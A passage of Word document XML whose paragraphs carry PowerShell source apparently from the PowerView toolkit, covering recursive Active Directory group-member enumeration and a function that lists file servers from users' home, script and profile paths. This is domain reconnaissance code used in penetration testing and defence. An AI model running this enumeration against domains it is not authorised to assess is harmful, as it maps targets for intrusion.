        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC2230F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C7EDD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61FB05AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # extract the FQDN from the Distinguished Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761591C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberDomain = $MemberDN.subString($MemberDN.IndexOf("DC=")) -replace 'DC=','' -replace ',','.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3485F6D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AE8C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A0D1E4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A0E920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberDN = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001C4D8A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberDomain = $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D76399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A14D4D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6C358E9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($Properties.samaccountname) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD6026" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # forest users have the samAccountName set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4E6B58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        $MemberName = $Properties.samaccountname[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E78EB21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE13ADC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9BFD03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        # external trust users have a SID, so convert it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214635EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8FBD23" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberName = Convert-SidToName $Properties.cn[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E579ABE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D8393F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F191801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            # if there's a problem contacting the domain to resolve the SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BAAA6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            $MemberName = $Properties.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24288C5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429D75D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBDCF4F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65C6D141" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'MemberDomain' $MemberDomain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1756965D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'MemberName' $MemberName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD328E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D50BD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'IsGroup' $IsGroup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12335254" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember | Add-Member Noteproperty 'MemberDN' $MemberDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EA2E97" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember.PSObject.TypeNames.Add('PowerView.GroupMember')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140A3B0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    $GroupMember</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67879C7D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="588B478B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    # if we're doing manual recursion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72447B0E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    if ($Recurse -and !$UseMatchingRule -and $IsGroup -and $MemberName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831C6F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        if($FullData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A9D2F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Get-NetGroupMember -FullData -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660EDED0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386BB49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42CBC4AC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                            Get-NetGroupMember -Domain $MemberDomain -DomainController $TargetDomainController -Credential $Credential -GroupName $MemberName -Recurse -PageSize $PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E44DC91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CE7799" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CF0904" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0299AF88" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEF960C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5C398E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6318DC58" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC9FB34" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1EB6CE90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="661F2787" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>function Get-NetFileServer {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543C4F3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B8D843" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D5AE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="70A54494" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns a list of all file servers extracted from user </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F44DADA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        homedirectory, scriptpath, and profilepath fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8CA50D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="31A4C4FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925A22F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53CBA61C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The domain to query for user file servers, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B0737D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A4B4ACA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3581130E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33C4DAAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205E97A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="57DAC3DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER TargetUsers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E98C741" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4620FDE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        An array of users to query for file servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB85E8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0E1041CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER PageSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B95BF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="020A14A9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The PageSize to set for the LDAP searcher object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C74985" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="135C6104" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A029DEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3171BE9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        A [Management.Automation.PSCredential] object of alternate credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A9FF8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for connection to the target domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD8363" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10664B9A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6F163B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="23B4B39F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetFileServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665B9A99" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346D67E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active file servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9F83BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="158D5C40" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18C961" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30F28F0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetFileServer -Domain testing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646655C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F4FF98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active file servers for the 'testing' domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05FE3753" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049D1B1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A25BE3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3500056C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDCE337" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21058CCC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF74373" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64E38EB5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E6A061" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A36EED" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="22E32ABA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEAF6FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TargetUsers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74122472" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="770D0FD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,10000)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2590A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A757C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $PageSize = 200,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E9FFB3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7A032DFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Management.Automation.PSCredential]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670883C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Credential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB431C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E55F07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="757B65EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    function SplitPath {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A026C3A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # short internal helper to split UNC server paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE9DD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        param([String]$Path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA712F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0DD512BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($Path -and ($Path.split("\\").Count -ge 3)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C7709" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Temp = $Path.split("\\")[2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AF6BB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Temp -and ($Temp -ne '')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3FDFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F3705C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432A3BBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46426B9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2781CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $filter = "(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(scriptpath=*)(homedirectory=*)(profilepath=*))"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FABD43D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -PageSize $PageSize -Filter $filter | Where-Object {$_} | Where-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFA13AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # filter for any target users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD1ED39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($TargetUsers) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29869CF1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetUsers -Match $_.samAccountName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3F9F7F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD68BBA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else { $True }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BB2814" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        } | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD4203" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # split out every potential file server path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DA3028" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($_.homedirectory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D761173" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                SplitPath($_.homedirectory)</w:t>
      </w:r>
    </w:p>
